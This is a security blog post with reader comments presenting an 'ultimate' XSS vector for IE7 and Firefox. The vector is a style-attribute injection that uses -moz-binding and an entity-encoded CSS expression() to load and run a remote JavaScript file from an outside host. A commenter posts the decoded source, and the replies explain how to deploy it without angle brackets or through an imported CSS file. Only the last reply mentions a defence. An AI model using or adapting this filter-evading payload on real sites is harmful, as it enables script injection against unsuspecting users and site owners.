# Ultimate XSS CSS injection

Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.

### Credits update

The expression part of this technique was first demonstrated by Dan on the slackers forums, nice one Dan sorry about missing you from the credits.

<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C
&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C
&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E
&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20
&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D
&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F
&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B
&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65
&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45
&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31
&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C
&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31
&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65
&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65
&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34
&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34
&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31
&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34
&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C
&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C
&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C
&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31
&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C
&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B
&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67
&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42
&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35
&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31
&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20
&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43
&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B
&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31
&#x3B&#x27&#x29 : 1);" id="inject">test</div>


Please use my tool Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broke up onto multiple lines for viewing purposes, please remove the line breaks when testing the vector.

### 28 Responses to “Ultimate XSS CSS injection”

1. .mario writes:

here are the sources

xx: e\xp\re\s\s\i\o\n((window.r!=1) ? val(‘x=String.fromCharCode;
scr=document.createElement(x(115,99,114,105,112,116));
scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,98,117,115,105,110,101,115,115,105,110,102,111,46,99,111,46,117,107,47,108,97,98,115,47,120,115,115,47,120,115,115,46,106,115));
document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);
window.r=1;’)

n1

2. Gareth Heyes writes:

Hackvertor can now reconstruct this attack using the tag XSS->mozbindingexpression

and even add the backslashes for you
Filter evasion->backslashesc

3. Marco Ramilli writes:

Very interesting,
another great Job Gareth !!

4. Vinicius K-Max writes:

wow!
very nice work

5. Eliena Andrews writes:

how do you use this code for xss ?

Eliena

6. Gareth Heyes writes:

You need to remove the line breaks and the code requires an id=”inject” to work on IE7. It can be injected within most HTML tags using the style attribute.

7. John Cantor writes:

So, its main advantage is on sites that filter “script” tags. You still need to pass “<” and “>” right?

8. Gareth Heyes writes:

Nope you don’t need “<” or “>” to use this injection, you just need a style attribute to inject.

9. DoctorDan writes:

Many thanks for the credit for the window.r trick. I hope I didn’t sound like I was specifically asking for credit on slackers- I was just trying to find out If I had come across the same trick as someone else or if it was an original idea. Nonetheless, I really appreciate the mention!

An damn, is that fine or what?! Nice work with that injection. A beautiful thing…

-Dan

10. Gareth Heyes writes:

Hey Dan no probs you contributed to the above vector so you deserve credit

12. Gareth Heyes writes:

LOL!

13. no.connexion writes:

Can you please show us the source of this xss before it was “hackvectoreted”. I guess that’s here there but I just don’t find any way to reverse it.

Thanks
PS. Nice work you guys

14. no.connexion writes:

Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/

15. no.connexion writes:

Sorry for the mess but don’t know to edit my post | guess thatâ€™s HEX there but I just donâ€™t find any way to reverse it. |*

16. Gareth Heyes writes:

@no.connexion

Hackvertor can also decode data you know 😉

Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor->XSS->mozbindingexpression

17. no.connexion writes:

Thanks for answer. Is it possible to use this XSS through a css file? What I’ve tryed to do is to insert <link href=”hxxp://wwwexample.com/css/xss.css”> and then <div class=”somename” style=”” id=”inject”>test</div> in html and the xss.css should look like <<< .sometext {
} >>>

or maybe something like that: body {
}

None of the above worked … maybe I doing smthing wrong way or it’s just not going to work.

18. Gareth Heyes writes:

@no.connexion

Yeah it’s possible to use it through a CSS file. In the file you need to define the rule as :-

body {
//code here
}

Then simply insert as a normal CSS through link or @import

19. no.connexion writes:

Thanks for response.
Here are my final thoughts.

<style type=”text/css”>
@import url(http://www.example.com/css/test.css);
</style>
<body>
<b> This IS a test </b>
</body>

and the in test.css:

b

{
}

OR

in test.css
b

{
}

AND it works fine for Firefox but IE70 does nothing. I’m using 7.0.5730.13.

20. Gareth Heyes writes:

@no.connexion

Dude you need to run “convert” in Hackvertor first before adding it to the page.

21. no.connexion writes:

I guess I was using the converted version in my css here:
b

{
}

I didn’t use all the converted code for obvious reasons. Can you please confirm that you’ve done this through css and it works ? If yes I’ll stop asking and I’ll work my ass to make this work.

22. Gareth Heyes writes:

Yep tested on IE and Firefox

23. no.connexion writes:

Please take a look in here:
hxxp://noconnexion.wordpress.com/

24. yasir writes:

coo000lllL :::::::: good work

25. Vinicius K-Max writes:

Firefox 3 fixed this xml hole?

26. Gareth Heyes writes:

Yeah it’s fixed in FF3 final, I think the beta it was still in but they removed it

I thought it was possible to do it inline but Giorgio mentioned it’s only available in chrome

27. sim writes:

how can you stop people from writing these type of attacks to a css file when allowing people to write there own css files on your server?

28. Gareth Heyes writes:

@sim

Validate the CSS using a CSS parser like anti-samy